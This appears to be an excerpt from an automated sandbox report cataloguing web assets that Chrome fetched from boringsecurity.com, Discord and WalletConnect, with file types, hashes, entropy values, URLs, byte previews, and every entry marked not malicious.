                                                                          Preview:.PNG........IHDR..............a......PLTEGpL..........................................................................................................................................................................................................................................................................................................................................................................................................................................WUW...... !.999BBB...ppp...///.........ono......wxw......ooo......@@@...XXX:::444!! ......tut888ZXZ .......yyy...........................yzy%%#XWXklk+,+qqq010mnmpnpkkk...'''AAA###......pop776IIIYXX........................333............---rrrwww___......vvv.......5.[....tRNS.........c....C..q......:....-%.1._y.6GF\v.[Q.....E|.L........+e.4#.....x..;.<...KI... .....D...}z.u.B3oROJPS.....N...0.......~`.wr..n.j....IDATx....{.W...+.-33C.N.033s....y..$.n...035e.ef....(..b.u.....}...?.F..+...+J...,.P1..B.Y.I...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 400x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                          Category:downloaded
                                                                          Size (bytes):9300
                                                                          Entropy (8bit):7.977337345519187
                                                                          Encrypted:false
                                                                          SSDEEP:192:pHBE9tJRXW9MqRTfGan9AygH+7JJKu3teRH5QDOuFQa9u:phs0Mq5n9Ay9rERwOuFQa9u
                                                                          MD5:F8D4C3C7B0A8FFC1DA0F3FDDEB9DF5F0
                                                                          SHA1:E9656A24390CDDDEF52D3190E7059DEDBEF85D16
                                                                          SHA-256:32EFE5B98531569D4EE92FFD791B6C3AD191A5178B224377FC427918AE4E2CAF
                                                                          SHA-512:C5DF5773F4F65D0BF9B591885A71BD79D3098F0042AC5E53E8E48E270A94C764DEA256CDD9D7CE43F6C23B6D79EC16708DEA81975900FBF78576A3D0097A509E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://explorer-api.walletconnect.com/w3m/v1/getWalletImage/204b2240-5ce4-4996-6ec4-f06a22726900?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1
                                                                          Preview:RIFFL$..WEBPVP8 @$......*....>I".D..!.Y.((....R....C]..,.}.2...1u...O..*.A..}...Y.w......K.......].....(._.....K..._..._.......O.......}......;......... ....zn{"............]../..-.....{O........./../.\5..}............&_....L~...~.q.}..o.?..?..}*}5.#.3...W...?......u.@5Q......$j...HI...P.e.o4...p+.........]I....M.......^*. ..C.7W....VI....@s.^......N%..mYC.Kf.bE7.X_7..Zc..n[+b?NHk.P...*..%5..,!...X..FS..K.s....0...RI.U.....}..s.c>.$.N.<..^..Z..9.i+s.S.....;..munm....+.....3x..rK....Y.@.e.5.<e..v..n...p\..V3..VQ3..|.mY.&.nu$.q.Z..U..7..~.xw..r..~<+c.7.c.]E....@U%=..S/DP...+*..h...5.4)...(x.a4"..bm...i.S.{...d...SSR..rm....$.Y.+*...h...#i..0&........... ....N...A.]..w.>.]..HW...\.3..CkK0e^..ag.....].j.....lj.r.....i^.q.....8..o.....7G[.......b$*..F+.C...Y...OOQ...v..^3r|.......-.$3...,...Z....b...u.....-.-...0..n.B.......S.4..!..K..~x.M...x?.\...,$.So.q.J...e.K.........@.D.O.!p.X...DZa..+Sl.J..Ed...%t...b.-N.............HS.T..+aKe|.:3.@f.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (25965), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):26001
                                                                          Entropy (8bit):5.177214745814603
                                                                          Encrypted:false
                                                                          SSDEEP:768:SNe+J/pSeFpR7tRao4h+Oj6h8lcUlhFl/tokWekgn:SLl7mJrmgn
                                                                          MD5:A640FECD54186E7EDC3B57B8C77E4C5D
                                                                          SHA1:8301C6ECA1E538EF2F189F113ECC955E528EF1EB
                                                                          SHA-256:B5523B4C21704EE476EACF69C84E42A38F99D6F299F9C6FE11AF7C315A2DE80B
                                                                          SHA-512:D48FADD548E1046AA31E638C80066FA93737CFEC903FDB98FCE863DB4278CB16B5B9F944DD3C2DCD94B56DB7CCC0D5A296A1BBCA849EA9138AE600F9E7C22E2E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/chunks/196-de1449618af62cf8.js
                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[196],{293:function(e,t,l){var r=l(11527),n=l(31909),a=l(40196),i=l.n(a),s=l(65282),C=l.n(s),o=l(47714);let c=()=>{let{t:e}=(0,o.$G)("common");return(0,r.jsx)("div",{className:"bg-nav-gray w-full text-xs border-t border-white",children:(0,r.jsxs)("div",{className:"max-w-screen-xl mx-auto py-4 text-white flex flex-col lg:flex-row items-center justify-between px-8 xl:px-0",children:[(0,r.jsxs)("div",{children:["\xa9 ",new Date().getFullYear()," Boring Security"]}),(0,r.jsx)("div",{children:(0,r.jsxs)("div",{className:"max-w-screen-xl mx-auto py-3 text-white flex flex-col md:flex-row items-center justify-center md:space-x-3",children:[n.y.map((t,l)=>{let{href:a,label:i}=t;return(0,r.jsxs)(C(),{className:"flex flex-row",href:a,children:[(0,r.jsx)("div",{className:"font-normal tracking-wider",children:(0,r.jsx)("span",{className:"underline text-xs text-white text-center",children:e(i)})}),l!==n.y.length-1&&(0,r.jsx)("div",
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):395
                                                                          Entropy (8bit):4.646873794844198
                                                                          Encrypted:false
                                                                          SSDEEP:6:tnrVzUOtumc4slvIl4slvUldboLYPsd9IZI0OuFxMdIr0a/NdpVo4a38n:trVzNtuCHvOdELYPsuI09z9LdYr38n
                                                                          MD5:E843C51C0EEC3801B70CAE5C45AD343F
                                                                          SHA1:AD735360ECFA829DB9D6C48F1A671A99BFCE1D2A
                                                                          SHA-256:F860149A77A53D43396F3AEC9377B9A0DD6C5D84459079C5D393F6343EC253FB
                                                                          SHA-512:2AF4816580FD02A2AE107914D967AF966CA97E137434E2668C7A430D34168E150F668AE3A3B005BFF7070D50A0FD89BD0B5A351F5E3DB6F6B167998378308F71
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/7442b576347c1d02886f.svg
                                                                          Preview:<svg width="12" height="12" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M2.9932 7.49727C5.48073 7.49727 7.49727 5.48073 7.49727 2.9932C7.49727 1.84421 7.06704 0.795708 6.35889 0C9.50595 0.188323 12 2.80018 12 5.99456C12 9.31127 9.31127 12 5.99456 12C2.80018 12 0.188323 9.50595 0 6.35889C0.795708 7.06704 1.84421 7.49727 2.9932 7.49727Z" fill="#FFFFFF"/>.</svg>.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (39547)
                                                                          Category:downloaded
                                                                          Size (bytes):39602
                                                                          Entropy (8bit):5.462009637179574
                                                                          Encrypted:false
                                                                          SSDEEP:768:6dFGSmfx4NsuKZpJuRxDJwe7I2g5xiw8alEp6Bhrl7:mFGSoxRuKZpJuRxDJw2gmLcvBhrR
                                                                          MD5:39B8702EDAB3AD2E1731F925511F1FD7
                                                                          SHA1:481FD4EDDD8D02948A6E242A6DAF03608EC0D1BC
                                                                          SHA-256:2114857A6318ACD9103306408D1E42E2057960A03EE53672783E3CF9F9BA6CA0
                                                                          SHA-512:B8864404FB98AC780A58EC0FECE078CDD0D3B454CB43FE15FC3800283C0F6C016379F2D8AF44D884EC4B362AD9C3C662BFD73622E8EEFC29ECBA91FBDA2C26C3
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/65800.657a577c4f6fc39eb27e.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["65800"],{916580:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return y}}),n("222007");var i=n("37983"),a=n("884691"),l=n("446674"),o=n("600965"),r=n("191225"),s=n("420444"),d=n("697517"),u=n("292687"),c=n("161778"),p=n("875268"),f=n("42203"),m=n("449501"),h=n("471671"),v=n("457112"),P=n("449008"),I=n("49111"),S=n("272505");let C={[I.PictureInPictureComponents.VIDEO]:p.default,[I.PictureInPictureComponents.EMBED_IFRAME]:d.default};class g extends a.PureComponent{render(){let{selectedPIPWindow:e,pipWindows:t,maxX:n,maxY:a,theme:l,dockedRect:o,appContext:r,roundCorners:s}=this.props;return(0,i.jsx)(v.default,{pictureInPictureComponents:C,selectedPIPWindow:e,pipWindows:t,maxX:n,maxY:a,dockedRect:o,theme:l,onWindowMove:this.handleWindowMove,appContext:r,roundCorners:s})}constructor(...e){super(...e),this.handleWindowMove=(e,t)=>{o.moveTo(e,t)}}}var y=l.default.connectStores([u.default,r.default,h.default
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 400 x 400, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):13794
                                                                          Entropy (8bit):7.949558066706105
                                                                          Encrypted:false
                                                                          SSDEEP:384:vyRNIF1mzTDhyupRiJlsGpaAdP2nq36Wq:dwhy2Rah5dPb361
                                                                          MD5:DB5D7F03841381501845DD7B137026D4
                                                                          SHA1:496E8B5515281271948A23C7F1AF0CF193A2A109
                                                                          SHA-256:BD78263887DB876F2E0415C83D766201C85D2F0B5EDD33D6151950433C3924CF
                                                                          SHA-512:8CC5F2FE6AD1A4E8D5937737CF6C3F13B3D9FCBE26D92499EC195522916F7B9D99158643DC58B0D82A11E956187C28B7495EEB1B8FD05544411E23582EB59673
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR..............a......PLTE.&C..,.&C..-..-..1..1. <..7.!<..6.#@.#@..9.%A.&C..,..0..9..1../..:.....6..2. ;.#?..-.!=..5.....8.%B..7.$A.$@..4.%A.%B../.">..-..3..-. <..2.!<..8..1..7..3.&B..;."=.#@.....3.">.......v........... <.............}.../...........5.|..t...........{...............4..:.y...........r...........~..z..p...9.....................................x.....q.....$@....u..s........w.....................*.....&................o...&..-....x..\..f..j..u..}..t.....N....._........b........t..S..d..o..h.....Ao........0.|......".t...#.W..+L.x......;.......Af.l...!..........q...........F.....l..:`..8.Hl..........Z..Gv.t..v.....i..Ns.o.........3.2W..1..5.U{.e..z..y..\..y........}........q..a........v.................W.....~.....&E..7....!<.......y.....O........j......:.....3."?..3..4....,f.....tRNS...............}v....2.IDATx...\.g.9_../A.Q.p..U.pT0V.B.c/.b...FV..k.3A=."." ...4W.Q.P."..(%D.Xc.~.gf....gwf........<...k...E......O}.....|..<...B../.c.B8./.c.B8./.c.B8./.c
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 38156, version 2.66
                                                                          Category:downloaded
                                                                          Size (bytes):38156
                                                                          Entropy (8bit):7.992862818603593
                                                                          Encrypted:true
                                                                          SSDEEP:768:YLYEgWfC/zlP948Q4NxhBiMwYatzdYZyXSihSZ9ia6UBJlly12m9U:YLYEszTFQyxfiMwYmxYZ1p9ia6U7r4U
                                                                          MD5:3D6549BF2F38372C054EAFB93FA358A9
                                                                          SHA1:E7A50F91C7EC5D5D896B55FA964F57EE47E11A1B
                                                                          SHA-256:8E401B056DC1EB48D44A01407CEB54372BBC44797D3259069CE96A96DFD8C104
                                                                          SHA-512:4BDE638A4111B0D056464CE4FD45861208D1669C117E2632768ACD620FCD924AB6384B3133E4BAF7D537872166EB50CA48899B3909D9DBF2A111A7713322FAD4
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/b9811218b3a54ad59fb2.woff2
                                                                          Preview:wOF2..............|T.......B............................. .`..P..<..W.....8..}.6.$..`..r.. ..n..F..v[.Vq...Q.r......9.../h....r~..y...)Jv.._@....Z...cm.z.(...u..#EMKK..e.mm..2,.FK...Y..mk].{...[.^UR......8p.jD.n.t..k.....b!.C...&8...._.-n69(...N....o..w..1...|.i....!..\...n.^.Kq..../]x.........x..N...=.^".ZF.L.6lD...X..[u.-.............y....\...%.q.....u~.y.K..>.d{...P..BU..2..p.nO.z....y~.....#DT...S.(d-~E.m...][..s...\..+.t..\!H.......'V...@.w..r['bc:V...X.d.86..c.......Xd<..p..N".9...X6..(|.C..t....0x.E.....8_.....Xs..8(...4I.X2J,Y[[....U..^I.y.#...w.R.....).o..i.....a......t+...Pz.%..FB..&.$.dS*.!$...iM;.*...K....;M....z`iw..j;.Su.I...O.Z9.....d....-2.Y2k.5....M.g..1u.$....T../.K.R1... ..?....C.&.wk..N.X....h.B.......};K@S...@'..4.;...|x.I.R....zj..Ph....\7...<.m~U ......Hu.(|SV<...?$.....MO.9.....H..z~R..9rD..y..H........N*..i....}..*"23.+........|i.[..|w..=.a-..E4...f..[....O9..g....x.0.c.f4..p[m.e/...)P......5.M......../..6.&..5.Rw
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 159 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):32848
                                                                          Entropy (8bit):7.9880871135443225
                                                                          Encrypted:false
                                                                          SSDEEP:768:ZtB/NQpdxZEWTGbzWUdOSfII+n3lVZX8wk5C:Zz/NQpNNTYW89fNO3DZh
                                                                          MD5:769E74C56DD37E21A6230D95918A8AA8
                                                                          SHA1:83E7155D263B6FF0A0E064AAC597D50A8A7BF61B
                                                                          SHA-256:D3FBFCA8AAB04D6EBFD8EA0E2F6A64246D64A92F114C4E06CE683B8FEDDB4426
                                                                          SHA-512:F9050166509CA2282B4D090A36EB0E1DC7BA46EEBC01729065B74C725A8005FDA45C386BD23443D0F0EF42CD96FC655436812673501723B085F8FE2172604FEC
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR.............a.yN....pHYs............e.. .IDATx....U...}....}.Ui...n..........1.0.;....Hw.H.5..Lw2.....9{NL.2\...G.g.9s..k.....X....{......|oA.Q>..T}.8..s........C.A.......9..k.^@.........s.+.C.]...B.3.....A&./.[..=.,......,.]..{..(P......X.....U....V............../.4......-.U........y.X1..-.+...dJ-....[.HrI..e..T..W.BAu+..-.V..U.Lji....6p6..C.5l..bcH9.,..CE...0../.U.]..../...........~..@.^..`$q\s....+..*..T.DIm+M..@'..jm.....fB....W..!.z.XbDq_...\...&.r.....;..Mg..'XF.......A.,V^.F{G. ...C....s.z_M.........on'.....j..R.k..uM....t=.......?.|.{...p.(......^.....o.u...[.:.(.[_.....@)..X...j../.....l..4~...S.|y@../.I..qv.j=5..Z..d.....%.V|w.......NRJ..%...G.%.,.(O.. .s...y..r.(.C0.`...5..j...PI...f....v.V..#.].....ubG.t....R.._.|.=.Nv_|v.\....:4.U.^.................,...=......Q...$..e.*.n...I$....N1......V..w.....Da4....CE<.'...../.>.{Qg..J...r.:T....~3.[_ S7.4..%0d=NM......i....E.6..._B.=._.....J}&.P..g..?5.d]E.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (56540)
                                                                          Category:downloaded
                                                                          Size (bytes):58346
                                                                          Entropy (8bit):5.457813983879697
                                                                          Encrypted:false
                                                                          SSDEEP:768:f8yysyBfyap3BVWIErgYO9E76d8N0V28UK/FxjMYTuTSGrAfc/Of:0yyrfyW3P0nO9wNAbF9MO0S/v
                                                                          MD5:CA7A8A7F3D78660FDFA37C82560A01BD
                                                                          SHA1:5743D1B01575B4304BD1F8B3292046605C58C760
                                                                          SHA-256:4DEF2A4063D19643A5E17CCDED3A9C50AF0B6730C3A3061DA7C61F1E751A5A66
                                                                          SHA-512:F05E2B627093CF74E38265642E5518F07EDA483FCD25F55F56CCC5F1BD377327FE11BAB75F1CD38E99F8A9F8A2BE8DC82FD5193686991E594E64E2DAA7D418CA
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/chunks/d3a2d874-4eb3a08696765140.js
                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[964],{98777:function(e,t,n){(e=n.nmd(e)).exports=function(){"use strict";function t(){return q.apply(null,arguments)}function n(e){return e instanceof Array||"[object Array]"===Object.prototype.toString.call(e)}function s(e){return null!=e&&"[object Object]"===Object.prototype.toString.call(e)}function i(e,t){return Object.prototype.hasOwnProperty.call(e,t)}function r(e){var t;if(Object.getOwnPropertyNames)return 0===Object.getOwnPropertyNames(e).length;for(t in e)if(i(e,t))return!1;return!0}function a(e){return void 0===e}function o(e){return"number"==typeof e||"[object Number]"===Object.prototype.toString.call(e)}function u(e){return e instanceof Date||"[object Date]"===Object.prototype.toString.call(e)}function l(e,t){var n,s=[],i=e.length;for(n=0;n<i;++n)s.push(t(e[n],n));return s}function h(e,t){for(var n in t)i(t,n)&&(e[n]=t[n]);return i(t,"toString")&&(e.toString=t.toString),i(t,"valueOf")&&(e.valueOf=t.valueOf),e}function
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (19958)
                                                                          Category:downloaded
                                                                          Size (bytes):20013
                                                                          Entropy (8bit):5.600147417453468
                                                                          Encrypted:false
                                                                          SSDEEP:384:A08tvX6lOAau4fIowe5w/aEWC+QbzpCORomxQdDxXNAJ:tMoeycMp2iQbNAJ
                                                                          MD5:5DE4F60B4EFA8BB9454EDB13D1CB9D83
                                                                          SHA1:5EB21A1FB900D78A23B781B715EE7F3EEB52B672
                                                                          SHA-256:B6399A12A07F326A303C82E16981091CC42B529EA9F8B0C6986A0D7E91036692
                                                                          SHA-512:5AF4B92EF618FE25A879557542C2C63DDDA9CB8041155C1D3C981CAEA86FA959C3B63CC3820DCF8D4DBF66E7EBFA2C4EBAA5AF03DAC3EE747FD67C34BEF3706C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/74836.b991877dde75f9619c99.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["74836"],{413476:function(e,t,n){"use strict";n.r(t),n.d(t,{ReportRaidExperiment:function(){return l},RaidAlertExperiment:function(){return r}});var i=n("862205");let l=(0,i.createExperiment)({kind:"guild",id:"2022-07_report_raids",label:"Report Raids",defaultConfig:{enableRaidReporting:!1},treatments:[{id:1,label:"Enable Reporting Of Raids",config:{enableRaidReporting:!0}}]}),r=(0,i.createExperiment)({kind:"guild",id:"2022-10_guild_raid_messaging",label:"Raid Alerts",defaultConfig:{enableRaidAlerts:!1},treatments:[{id:1,label:"Enable Reporting Of Raids",config:{enableRaidAlerts:!0}}]})},592407:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return N}});var i=n("759843"),l=n("872717"),r=n("913144"),d=n("54239"),s=n("605250"),u=n("413476"),a=n("81732"),o=n("479756"),E=n("38654"),_=n("267567"),S=n("271938"),I=n("26989"),c=n("305961"),T=n("730622"),G=n("840707"),f=n("900938"),p=n("49111"),D=n("782340");le
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):69647
                                                                          Entropy (8bit):5.445913594529979
                                                                          Encrypted:false
                                                                          SSDEEP:1536:vtVJZsRwmhK6SxYeFwnjlc7noDO1HGSrXksv1M:vHJShc7oNCndM
                                                                          MD5:BAFDBED663F8D0545941E6DD06147A69
                                                                          SHA1:78899ED8D741F6AD82B82921838A636E97AF2ABE
                                                                          SHA-256:F5925E7C1D5924DD664694670978E0CAB1132D264FE1FAE7FEC9E474F7E9A1E5
                                                                          SHA-512:04BCBB504B48ADE3429CD44B7AA1F2CA2DFD58BCB600AC533F549386FD58F641DE9B67B33C6156F6203BB5DD2A1752F0B27BD9EC2895CD0C8D21EDB22FA84C9A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/8240.865c70ef34cec1e11192.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["8240"],{295426:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return a}});var i=n("913144"),a={clearDraft(e,t){i.default.dispatch({type:"DRAFT_CLEAR",channelId:e,draftType:t})},saveDraft(e,t,n){i.default.dispatch({type:"DRAFT_SAVE",channelId:e,draft:t,draftType:n})},changeDraft(e,t,n){i.default.dispatch({type:"DRAFT_CHANGE",channelId:e,draft:t,draftType:n})},changeThreadSettings(e,t){i.default.dispatch({type:"THREAD_SETTINGS_DRAFT_CHANGE",channelId:e,draft:t})}}},943314:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return i}});var i=(0,n("862205").createExperiment)({kind:"user",id:"2022-12_forum_activity",label:"Increased activity view for Forums, per user",defaultConfig:{enabled:!1},treatments:[{id:1,label:"Enabled",config:{enabled:!0}}]})},531869:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return i}});var i=(0,n("862205").createExperiment)({kind:"guild",id:"2023-01
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (8516)
                                                                          Category:downloaded
                                                                          Size (bytes):8571
                                                                          Entropy (8bit):5.409014490778988
                                                                          Encrypted:false
                                                                          SSDEEP:96:Tjjdwd8yIDjWidmkRAOdFGdFgju+cE3V/aA3DzueyDtcFfxUu3G+dAEEYtbxi2Xo:Tji+qimOm/Muk3Vxp3dni2X2YsH9
                                                                          MD5:21A8C89D3C1E8957C7C11DD572465D34
                                                                          SHA1:C089ADB122C4A8E7C870B678557BE7CF1B66C210
                                                                          SHA-256:94A4CDD655B493621E83842AE78C1375A4DB2B554DC14BE27E59CC81CE086E15
                                                                          SHA-512:0461101FD3DC27101F08B8C7B6ECF34A504AB2329A82926CD15350FF5F3EAE282CB569353F1C12B09AE8B1BC8B202356BD1D25774F41A72240DCD587E54EB011
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/35306.b8cb1ccc1b838a7a51bf.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["35306"],{401690:function(e,n,t){"use strict";t.r(n),t.d(n,{default:function(){return q}}),t("222007"),t("424973");var l=t("917351"),i=t.n(l),d=t("249654"),u=t("446674"),r=t("913144"),a=t("233069"),o=t("42203"),f=t("305961"),s=t("660478"),_=t("18494"),c=t("689275"),E=t("755624"),h=t("984674"),A=t("724210");let T={},v={},g={},C={},p={},D={},S=null,m={};function N(){for(let e in T={},p={},v={},g={},C={},S=_.default.getChannelId(),m)clearTimeout(m[e]);m={},c.default.forEachGuild(e=>{R(e)}),F()}function U(e){for(let n in delete T[e],delete p[e],delete v[e],delete g[e],delete C[e],R(e),g[e])P(e,n)}function R(e){let n=c.default.getThreadsForGuild(e);for(let e in n)for(let t in n[e]){y(t);let e=o.default.getChannel(t);if(null==e)continue;let n=E.default.joinTimestamp(t);if(null!=n){let t={channel:e,joinTimestamp:n.getTime()},{isUnread:l,isRelevant:i,isTimedRelevant:d}=w(e);k(T,e,t,!1),k(p,e,i?t:null,!1),k(v,e,l?t:null,!1),
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):12
                                                                          Entropy (8bit):3.2516291673878226
                                                                          Encrypted:false
                                                                          SSDEEP:3:YMvW6n:YMvRn
                                                                          MD5:3C607E1C1756889D9BE36C56FCB7BF98
                                                                          SHA1:AC3BB6B2469E2F79AE4EC7523ADD3357B7C8FA47
                                                                          SHA-256:53B148F86D9019A9354705AB51E75CB7CF8197233A146388D1D26734F687815B
                                                                          SHA-512:5535682A32206510011A7DAFB3D6E483B815A0154457E1EA705BB83609388DA9AB3D927D59CA97FCE9E6D69F11714458085D0D8993EC7DECFEDD1CE03A957CD8
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:{"id":11302}
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 64x64, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                          Category:downloaded
                                                                          Size (bytes):870
                                                                          Entropy (8bit):7.787514640500376
                                                                          Encrypted:false
                                                                          SSDEEP:12:kypkAT2iveAYblKasyRAO6EHIdAi1hfVH/CaFHNOXEMvO1PWVIh58FV:WNHRAO6PdAkJ/Tt4O1PQIniV
                                                                          MD5:1FEDED7AF4749EBD4B90668B16E9BACD
                                                                          SHA1:DD2A6080262A0905638163BFD21BE5EDF88D5CA2
                                                                          SHA-256:F8B73B7408BDDDB7A0F88115036245D0B67D5E919EA6BE6B609F578DAB70EFC2
                                                                          SHA-512:14539002FF9FF3041035D5E2BFC140464BB9885700A932D74518CE1A35F7C22932454160FE082B289A39488D4B827F1B3A9BD0A271B4556FDDD7E51DF4EACBE7
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://cdn.discordapp.com/icons/933253328794689546/9b0ad1a7a2c911684a0e7e6e1e7bce2e.webp?size=64
                                                                          Preview:RIFF^...WEBPVP8 R........*@.@.>m..G$".........g......n..+.......'.........F..lF..........W}.=5..6Y.....*\...o.F......N.....K5Y..r.(..u.l.F.]..b..64.{....o..P!......\.0.....[......S....*WX&N..H..l.Ny...M$.@.7.c..oVL....-x'.[..{..T.+.p.w...eE.:..F^.{U.c..z...u..fiq..p.J.....<)n>.&..B4.. ....Z7..Xvq.CF.5.).F..a.c.......;....?~.>......'g.'.._..n..o...|=..RVW.....:u\...6Z.1.<w...~ .S.n{L.....K..N45..'.:..\.).[5.Ka.D.:h...6U..5..((R..........!.^J.@.9...@]..(L.........?l96=.....X.)....l..#........@.o....}.../.....Tj....#.#.-.4;^.....I.u..!.4&sb.......An..|.....;>!Z...(!.....C............tiN....9y...8.........&y.r.!.....^J..[..,.%.y.m..J....\q.s.z.Go.J..+.2..W].0E....r..zhA.G.}.7....1%"..<....*....^..%....E:]>Ft....*O..U.x.>'.......h..{../.+J.kc'........o%.%.m.p.l....$+.i....a-[.d.y.s....`.wC..=.......5$*..#.U...T......;.....
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=0], progressive, precision 8, 1840x1057, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):179404
                                                                          Entropy (8bit):7.96431884801933
                                                                          Encrypted:false
                                                                          SSDEEP:3072:1tLHdz0JSRVgwEwfWU0qwass1qUrrgaTkDrPU5p7LaFkOabJoyQHqcv:bCJSHg1UWU0qXsEgjfkUKJoPH3v
                                                                          MD5:2EEBAE7FEC8841B6D1C70F44AF90E19A
                                                                          SHA1:99535FEE3574669B64B618D3C04A9CBCD741A972
                                                                          SHA-256:2499DC441836E4FB5A19FD1BB49C739594111B24D030EB60886FA1187EDD944C
                                                                          SHA-512:320D1743572DA06A0F1E343BCA54BA3C906122B336F80B2906BC1352D3A4C3075096269CAA20D33C317B09F932146CAEC61E26D65D9182ACF96CAA6926A617CC
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/images/grill.jpg
                                                                          Preview:......Exif..MM.*..............Ducky..............http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.9ccc4de93, 2022/03/14-14:07:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:D7460F08C77C11EC8FB0A9EDF2FB2654" xmpMM:InstanceID="xmp.iid:D7460F07C77C11EC8FB0A9EDF2FB2654" xmp:CreatorTool="Adobe Photoshop 2022 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="7F43989A5298C22DF9E0C92700B1EE7D" stRef:documentID="7F43989A5298C22DF9E0C92700B1EE7D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...HPhotoshop 3.0.8BIM..........Z...%G........8BIM.%............x/4b4.Xw....!Adobe.d..............Y...W%...............&..&0%.%0,%$$%,;33333;C>>>>>>CCCCC
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):1150
                                                                          Entropy (8bit):4.106811797800129
                                                                          Encrypted:false
                                                                          SSDEEP:24:tYmJuVoGLt3pyWHd12sVVyFhvaSOTP8O0f8bj:DEt3QW91jVChCSOQVq
                                                                          MD5:B84A7FB6BFA0C7E01706CA53B0CF84EC
                                                                          SHA1:A3A7CD7AD059F64F103E888EE500BB474BFB0AC4
                                                                          SHA-256:061565F5EDDFD4FEA975BB3F51D57761AE17449E77359578768304F8E9DF53EE
                                                                          SHA-512:B3598B4EFD5026E31B3996C1279F620FEDD4D700819792F3659A4A275B6A3486ED9FD5F4561138987D630403276191A900206103256D3F1C3927302184642F5A
                                                                          Malicious:false
                                                                          Reputation:low
